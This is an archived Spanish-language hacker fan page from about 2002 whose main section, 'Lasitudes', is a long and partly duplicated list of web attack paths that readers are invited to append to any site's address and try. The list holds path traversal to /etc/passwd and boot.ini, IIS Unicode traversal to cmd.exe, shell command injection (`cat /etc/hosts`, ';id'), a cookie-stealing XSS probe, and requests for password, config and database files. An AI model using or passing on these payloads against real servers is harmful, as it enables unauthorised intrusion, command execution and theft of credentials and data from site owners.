.:: Actualizate ::.

.:: Estádisticas ::.
00/00/0000 .:: Visitas ::.

.:: Hora Actual ::.

00:00:00

 .:: Entraste a la page... ::.

.:: Hora GMT ::.

00:00:00

 .:: Usuarios Online ::.

    SISTEMAS OP.
 

Windows ®

GNU/Linux ®

Mac OS ®

Solaris ®

D.O.S ®

  
 
    ACERCA DE...
 

La page

Los autores

Las actualizaciones

  
 
    MAS GILADAS
 

Pagina de Inicio

Agregar a Favoritos

Obtene tu propia cuenta

Servicio de Chat

 

 
 

 

  
Lasitudes (Vulnerabilidades...)

 

En principio aclaremos que son las vulnerabilidades en una web page. Weno una vulnerabilidad (hablando dentro de los terminos de una pagina) es algo que hace vulnerable a la misma, valga la redundancia. Es decir, algo que hace que la pagina quede expuesta a ser modificada en algunos aspectos, algo que hace que la pagina se sensibilice y asi poder explotar nuestros conocimientos dentro de ella, por asi decirlo..

 

A continuación se mostrará una lista detallada de vulnerabilidades, algunas de ellas todabia funcionan, otras por el contrario, con todo esto de las nuevas tecnologias y el cambio, etc. dejaron de funcionar. Pero lo que vala aca es que intenten, prueben, descubran y disfruten.

 

Lo que tienen que hacer para usar estas vulnerabilidades es poner:

www.pagina.com/vulnerabilidad

 

/webMathematica/MSP?MSPStoreID=../../../../../etc/passwd&MSPStoreType=image/gif

/cgi-bin/cgiemail?required-webmaster=xxx@xxx.com&required-from=zzz@zzz.com&required-

/boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/

/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories /launch.jsp?NFuse_Application=alert(document.cookie); 

/user.php?

/database/metacart.mdb /metacart/database/metacart.mdb/home.php?arsc_language=elvishishness /bigsam_guestbook.php?displayBegin=9999...9999

/phpBB2/includes/db.php?phpbb_root_path= 

/includes/db.php?phpbb_root_path= 

/phpBB/bb_memberlist.php?sortby=user_regdate 

/../boot.ini 

/../../boot.ini 

/`cat%20/etc/hosts`

/cgi-bin/test-cgi.bat?|dir+c:+..\htdocs\dir.txt /csSearch.cgi?command=savesetup&setup=`cat%20/etc/hosts`

/cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/hosts` 

/scripts/root.exe?/c+dir 

/MSADC/root.exe?/c+dir 

/c/winnt/system32/cmd.exe?/c+dir

/d/winnt/system32/cmd.exe?/c+dir 

/scripts/..%255c../winnt/system32/cmd.exe?/c+dir /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir

/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir

/scripts/..%252f../winnt/system32/cmd.exe?/c+dir 

/c/inetpub/scripts/root.exe?/c+dir 

/d/inetpub/scripts/root.exe?/c+dir 

/srchadm 

/iissamples 

/iissamples/Default

/iissamples/ExAir 

/iissamples/ISSamples 

/iisamples/Sdk 

/Scripts/samples 

/Scripts/tools 

/_private 

/_vti_bin 

/_vti_log 

/_vti_pvt 

/_vti_txt 

/cgi-bin/_vti_cnf 

/_vti_bin/_vti_adm

/_vti_bin/_vti_aut 

/scripts/IISADMPWD 

/admisapi/ 

/scripts/Fpadmcgi.exe 

/msadc/samples/adctest.asp 

/_vti_bin/_vti_aut/author.dll 

/_vti_adm/admin.dll

/scripts/proxy/w3proxy.dll 

/scripts/cpshost.dll

/scripts/convert.bas 

/Sites/Knowledge/ 

/Sites/Samples/ 

/SiteServer/Publishing/ 

/scripts/perl 

/scripts/iisadmin/default.htm

/scripts/../../cmd.exe 

/cgi-win/wincgi.bat 

/scripts/convert.bas 

/..../Windows/Admin.pwl 

/_vti_bin/shtml.dll/_vti_rpc 

/_vti_bin/_vti_aut/author.dll 

/_vti_bin/_vti_aut/dvwssr.dll

/Scripts/ 

/cgi-bin/ 

/srchadm 

/iisadmin 

/iissamples 

/iissamples/Default 

/iissamples/ExAir 

/iissamples/ISSamples 

/iisamples/Sdk 

/_private 

/cgi-bin/_vti_cnf

/_vti_bin/_vti_adm

/_vti_bin/_vti_aut 

/scripts/iisadmin 

/scripts/IISADMPWD 

/scripts/iisadmin/samples 

/scripts/iisadmin/tools 

/admisapi/ 

/scripts/Fpadmcgi.exe 

/msadc/samples/adctest.asp

/_vti_bin/_vti_aut/author.dll 

/scripts/proxy/w3proxy.dll 

/scripts/cpshost.dll 

/AdvWorks/equipment/catalog_type.asp 

/scripts/perl 

/cgi-bin/visitor.exe

/scripts/../../cmd.exe

/scripts/convert.bas 

/cgi-bin/lasso.cgi 

/cgi-bin/rwwwshell.pl 

/cgi-bin/unlg1.1 

/cgi-bin/unlg1.2 

/cgi-bin/phf 

/cgi-bin/phf.cgi 

/cgi-bin/test-cgi 

/cgi-bin/finger 

/cgi-bin/Count.cgi

/cgi-bin/jj 

/cgi-bin/day5datacopier.cgi 

/cgi-bin/day5datanotifier.cgi 

/cgi-bin/php.cgi 

/cgi-bin/php 

/cgi-bin/nph-test-cgi 

/cgi-bin/nph-publish 

/cgi-bin/handler 

/cgi-bin/webdist.cgi

/cgi-bin/wrap.cgi 

/cgi-bin/AnyForm2

/cgi-bin/webgais 

/cgi-bin/websendmail 

/cgi-bin/faxsurvey 

/cgi-bin/htmlscript 

/cgi-bin/pfdisplay.cgi 

/cgi-bin/wwwboard.pl 

/cgi-bin/www-sql

/cgi-bin/view-source 

/cgi-bin/campas 

/cgi-bin/aglimpse 

/cgi-bin/glimpse 

/cgi-bin/man.sh 

/cgi-bin/AT-admin.cgi 

/cgi-bin/AT-generate.cgi 

/cgi-bin/filemail.pl 

/cgi-bin/maillist.pl

/cgi-bin/info2www

/cgi-bin/files.pl 

/cgi-bin/bnbform.cgi 

/cgi-bin/survey.cgi 

/cgi-bin/textcounter.pl 

/cgi-bin/classifieds.cgi 

/cgi-bin/environ.cgi 

/cgi-bin/wrap

/cgi-bin/cgiwrap

/cgi-bin/edit.pl 

/cgi-bin/perl 

/cgi-bin/Xrun.cgi

/cgi-bin/webgais 

/cgi-bin/dumpenv.pl 

/test/test.cgi-bin 

/scripts/submit.cgi-bin 

/users/scripts/submit.cgi-bin

/cgi-bin/guestbook.cgi 

/cgi-bin/guestbook.pl 

/cgi-bin/cachemgr.cgi 

/cgi-bin/whois_raw.cgi 

/cgi-bin/responder.cgi 

/cgi-bin/perlshop.cgi 

/cgi-bin/webwho.pl 

/cgi-bin/search.cgi?letter= 

/cgi-bin/plusmail

/cgi-bin/htsearch 

/cgi-bin/loadpage.cgi 

/cgi-bin/rpm_query 

/cgi-bin/infosrch.cgi 

/cgi-bin/getdoc.cgi 

/cgi-bin/bizdb1-search.cgi 

/cgi-bin/htsearch?config=aaa

/piranha/secure/passwd.php3 

/ultraboard.pl 

/cgi-bin/ultraboard.cgi 

/scripts/dbman/db.cgi-bin 

/cgi-bin/formmail.cgi 

/cgi-bin/dnewsweb.cgi 

/cgi-bin/dmailweb.cgi

/cgi-bin/calender.pl 

/cgi-bin/calender_admin.pl 

/cgi-bin/allmanage.pl 

/cgi-bin/allmanageup.pl 

/cgi-bin/ssi 

/cgi-bin/redirect.cgi 

/cgi-bin/changepw.cgi 

/cgi-bin/counterfiglet/nc/f

/cgi-bin/mdma.bat 

/cgi-bin/search/tidfinder.cgi?2956734 

/cgi-bin/cvsweb/cvsweb.cgi 

/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00

/pccsmysqladm/incs/dbconnect.inc 

/cgi-bin/admin/admin 

/cgi-bin/netauth.cgi 

/cgi-bin/htgrep 

/cgi-bin/wais.pl 

/admin.php3?admin=anything 

/cgi-bin/amlite/amadmin.pl

/cgi-bin/subscribe.pl 

/cgi-bin/news/news.cgi 

/cgi-bin/awl/auctionweaver.pl 

/cgi-bin/mailto.cgi 

/cgi-bin/YaBB.pl 

/cgi-bin/mailform.pl

/Newuser?Image=../../database/rbsserv.mdb /cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml 

/cgi-bin/webdata.cgi 

/cgi-bin/cached_feed.cgi /cgi-bin/mailfile.cgi

/cgi-bin/global.cgi 

/cgi-bin/pagelog.cgi 

/cgi-bin/scripts/whois.cgi?action=load&whois=check 

/cgi-bin/Search.pl

/cgi-bin/gbook/gbook.cgi?_MAILTO=check;id 

/cgi-bin/bb-hist.sh

/cgi-bin/build.cgi 

/cgi-bin/cgiforum.pl 

/forum/common.php 

/phorum/common.php 

/index.php3?vhosts[test]= 

/cgi-bin/db2www/library/document.d2w/show

/submit.php?CONF=anything 

/phpgroupware/inc/phpgwapi/phpgw.inc.php 

/cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES= 

/cgi-bin/ad.cgi 

/cgi-bin/simplestmail.cgi

/cgi-bin/everythingform.cgi 

/cgi-bin/simplestguest.cgi 

/cgi-bin/ezshopper3/loadpage.cgi 

/cgi-bin/ezshopper2/loadpage.cgi 

/subscribe.pl?test@test.com

/technote/main.cgi-bin/oops?board=FREE_BOARD&command=down_load&filename=/../main.cgi /technote/print.cgi-bin 

/cgi-bin/register.cgi

/cgi-bin/newsdesk.cgi?t=../pass.txt 

/cgi-bin/webdriver 

/cgi-bin/bbs_forum.cgi 

/cgi-bin/setpasswd.cgi 

/cgi-bin/scancfg.cgi 

/cgi-bin/CrazyWWWBoard.cgi

/cgi-bin/empower?DB=UkRteamHole 

/cgi-bin/pals-cgi 

/ROADS/cgi-bin/search.pl 

/way-board/way-board.cgi-bin 

/cgi-bin/replicator/webpage.cgi 

/cgi-bin/auktion.pl

/opendir.php?requesturl=/etc/passwd 

/cgi-bin/webspirs.cgi 

/cgi-bin/commerce.cgi?page=check 

/cgi-bin/store.cgi?StartID=../etc/hosts%00.html 

/cgi-bin/hsx.cgi

/cgi-bin/mailnews.cgi 

/cgi-bin/adcycle 

/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd /caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini

/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server /caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC

/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000 

/user.php&op=saveuser 

/banners.php?op=Change 

/cgi-bin/post-query 

/cgi-bin/ikonboard/help.cgi

/cgi-bin/s.cgi?q=a&tmpl=check 

/cgi-bin/anacondaclip.pl?template=check 

/cgi-bin/webspirs.cgi 

/cgi-bin/ustorekeeper.pl

/cgi-bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&TopicSubject= &replyto=0 

/cgi-bin/processit.pl 

/cgi-bin/nph-maillist.pl 

/cgi-bin/dcboard.cgi

/cgi-bin/dcadmin.cgi 

/cgi-bin/dcforumlib.pl 

/cgi-bin/upload_file.pl 

/filemanager/filemanager_forms.php 

/cgi-bin/lasso.cgi 

/cgi-bin/rwwwshell.pl 

/cgi-bin/unlg1.1 

/cgi-bin/unlg1.2

/cgi-bin/phf 

/cgi-bin/phf.cgi 

/cgi-bin/test-cgi 

/cgi-bin/finger 

/cgi-bin/Count.cgi 

/cgi-bin/day5datacopier.cgi 

/cgi-bin/day5datanotifier.cgi 

/cgi-bin/php.cgi 

/cgi-bin/php

/cgi-bin/nph-test-cgi 

/cgi-bin/nph-publish 

/cgi-bin/handler 

/cgi-bin/webdist.cgi 

/cgi-bin/wrap.cgi 

/cgi-bin/AnyForm2 

/cgi-bin/webgais 

/cgi-bin/websendmail 

/cgi-bin/faxsurvey

/cgi-bin/htmlscript 

/cgi-bin/pfdisplay.cgi 

/cgi-bin/perl.exe 

/cgi-bin/wwwboard.pl 

/cgi-bin/www-sql 

/cgi-bin/view-source 

/cgi-bin/campas 

/cgi-bin/aglimpse 

/cgi-bin/man.sh

/cgi-bin/AT-admin.cgi 

/cgi-bin/AT-generate.cgi 

/cgi-bin/filemail.pl 

/cgi-bin/maillist.pl 

/cgi-bin/info2www 

/cgi-bin/files.pl 

/cgi-bin/bnbform.cgi 

/cgi-bin/survey.cgi

/cgi-bin/textcounter.pl 

/cgi-bin/classifieds.cgi 

/cgi-bin/environ.cgi 

/cgi-bin/wrap 

/cgi-bin/cgiwrap /

cgi-bin/edit.pl 

/cgi-bin/perl 

/domcfg.nsf 

/today.nsf 

/names.nsf 

/catalog.nsf

/log.nsf 

/domlog.nsf 

/cgi-bin/Xrun.cgi 

/cgi-bin/webgais

/cgi-bin/dumpenv.pl 

/adminlogin?RCpage=/sysadmin/index.stm 

/test/test.cgi 

/scripts/submit.cgi

/users/scripts/submit.cgi 

/cgi-bin/guestbook.cgi 

/cgi-bin/guestbook.pl 

/cgi-bin/cachemgr.cgi 

/cgi-bin/whois_raw.cgi 

/cgi-bin/responder.cgi 

/cgi-bin/perlshop.cgi

/ncl_items.html?SUBJECT=2097

/cgi-bin/webwho.pl /manage/cgi/cgiproc 

/cgi-bin/query 

/cgi-bin/w3-msql 

/cgi-bin/search.cgi?letter= 

/cgi-bin/plusmail

/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi 

/cgi-bin/htsearch 

/cgi-bin/loadpage.cgi 

/cgi-bin/rpm_query 

/cgi-bin/infosrch.cgi 

/publisher 

/PSUser/PSCOErrPage.htm

/cgi-bin/getdoc.cgi 

/cgi-bin/bizdb1-search.cgi 

/cgi-bin/htsearch?config=aaa 

/piranha/secure/passwd.php3^Redhat 6.2 backdoor(passwd.php3);; 

/ultraboard.pl

/cgi-bin/ultraboard.cgi 

/scripts/dbman/db.cgi 

/cgi-bin/formmail.cgi 

/cgi-bin/dnewsweb.cgi

/cgi-bin/dmailweb.cgi 

/cgi-bin/calender.pl 

/cgi-bin/calender_admin.pl

/cgi-bin/allmanage.pl 

/cgi-bin/allmanageup.pl 

/cgi-bin/ssi 

/adpassword.txt 

/cgi-bin/redirect.cgi 

/cgi-bin/changepw.cgi 

/cgi-bin/counterfiglet/nc/f 

/cgi-bin/mdma.bat

/cgi-auth/userreg.cgi 8987/sawmill /cgi-bin/search/tidfinder.cgi?2956734 /cgi-bin/view_page.html 

/admin-serv/config/admpw 

/cgi-bin/cvsweb/cvsweb.cgi

/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00 /examples/applications/bboard/bboard_frames.html 

/pservlet.html /login.jsp 

/ConsoleHelp/login.jsp

/pccsmysqladm/incs/dbconnect.inc 

/cgi-bin/admin/admin 

/cgi-bin/netauth.cgi 

/cgi-bin/htgrep 

/cgi-bin/wais.pl 

/admin.php3?admin=anything 

/cgi-bin/amlite/amadmin.pl

/cgi-bin/subscribe.pl 

/cgi-bin/news/news.cgi

/cgi-bin/awl/auctionweaver.pl 

/phpPhotoAlbum/explorer.php 

/cgi-bin/mailto.cgi 

/search97cgi/vtopic 

/cgi-bin/YaBB.pl

/cgi-bin/mailform.pl 

/Newuser?Image=../../database/rbsserv.mdb /cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml 

/cgi-bin/webdata.cgi 

/cgi-bin/cached_feed.cgi

/cgi-bin/mailfile.cgi 

//WEB-INF/ 

/exec/show/config/cr 

/cgi-bin/global.cgi^*BSD Global Port (global.cgi) ;; 

/cgi-bin/pagelog.cgi^Pagelog (pagelog.cgi);;

/cgi-bin/scripts/whois.cgi?action=load&whois=check 2301/survey /cgi-bin/gbook/gbook.cgi?_MAILTO=check;id 

/cgi-bin/bb-hist.sh 

/cgi-bin/build.cgi 

/cgi-bin/cgiforum.pl

/forum/common.php 

/phorum/common.php 

/index.php3?vhosts[test]= 

/cgi-bin/db2www/library/document.d2w/show 

/includes/global.inc 

/submit.php?CONF=anything

/8765/index.html 

/8765/example/ 

/phpgroupware/inc/phpgwapi/phpgw.inc.php 

/cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES= 

/cgi-bin/ad.cgi 

/cgi-bin/simplestmail.cgi

/cgi-bin/everythingform.cgi 

/cgi-bin/simplestguest.cgi

/cgi-bin/ezshopper3/loadpage.cgi 

/cgi-bin/ezshopper2/loadpage.cgi 

/subscribe.pl?test@test.com

/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi /cgi-bin/register.cgi 

/cgi-bin/newsdesk.cgi?t=../pass.txt

/cgi-bin/webdriver

/cgi-bin/bbs_forum.cgi 

/class/mysql.class 

/inc/sendmail.inc 

/setpasswd.cgi 

/scancfg.cgi 

/cgi-bin/empower?DB=UkRteamHole 

/cgi-bin/pals-cgi 

/ROADS/cgi-bin/search.pl

/way-board/way-board.cgi 

/cgi-bin/replicator/webpage.cgi 

/cgi-bin/auktion.pl 

/opendir.php?requesturl=/etc/passwd 

/cgi-bin/webspirs.cgi 

/cgi-bin/commerce.cgi?page=check

/cgi-bin/ipf/etc/gfw/ui/pwd.dat 

/cgi-bin/hsx.cgi 

/cgi-bin/mailnews.cgi 

/cgi-bin/adcycle 

/cgi-bin/post-query 

/cgi-bin/s.cgi?q=a&tmpl=check 

/cgi-bin/webspirs.cgi

/cgi-bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi& TopicSubject=&replyto=0 

/cgi-bin/processit.pl 

/cgi-bin/nph-maillist.pl 

/cgi-bin/cal_make.pl

 
    GUESTBOOK
 

Firmar

Ver

  
 
    SUSCRIBITE
 

Suscribite en HE

 
 
    FORO
 

Entra al Foro de HE

  
 
    ESTADISTICA
 

[ Mi @ ]

  
 
    NOTICIAS
 

Hack Enterprise llego a la Internet, con su escasa y cuarta version (0.4) que denomine humildemente "que seguimos haciendo... se leyendo y leyendo..."

_______________

Debido a que GALEON.COM es una mierda, si, una completa mierda con todas las letras, la web se mudo, como podrán ver a otro servidor con muchos mas recursos, bah muchos mas recursos es solo un decir, en fin...: Mi@RROBA.COM.

_______________

Che agregue ese tagboard espero que escriban un par  de giladas...

_______________

Se expusieron las secciones de Phreaking, Virii, Exploits, Solaris y Lasitudes (ehhh para la gente del campo, son vulnerabilidades ¬¬).

_______________

Loko saludos para la gilada q me conoce leo, recal, petaquita, melga, tsubasa, gustavete, marco, chicho, matias, caldera, gordi, rolfi, strica, lea, pelado, braun, chanis, eri, mariam, flo, colo, y para los q me olvide...

_______________

Ea... tenemos cuenta de email en ZZN si tenes dudas etc etc manda los email a:

hacke@hackenterprise

.zzn.com

webmaster@hackenterprise

.zzn.com

________________

Obtene tu propia cuenta!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Solo clikea : A C A :

 

  
 
    MENSAJES
 

 
 

 

| Hack Enterprise [ http://hacke.webcindario.com ] | Todos los derechos reservados ® | CopyRight 2002-2XXX © | Prohibida la copia parcial y/o total de la web | Prohibido linkear links linkeados, linkear links tambien... sin la previa y/o anticipada autorizacion de/los webmaster(s) | Queda reservado por copyright todo el diseño de la web, imagenes, logos, etc... | Webmasters -> webmaster@hackenterprise.zzn.com | Page -> hacke@hackenterprise.zzn.com | Webmaster limp -> Mario E. Geréz de La República Argentina, Bs. As., La Matanza, Isidro Casanova | Gracias a las webs amigas por el material brindado ! |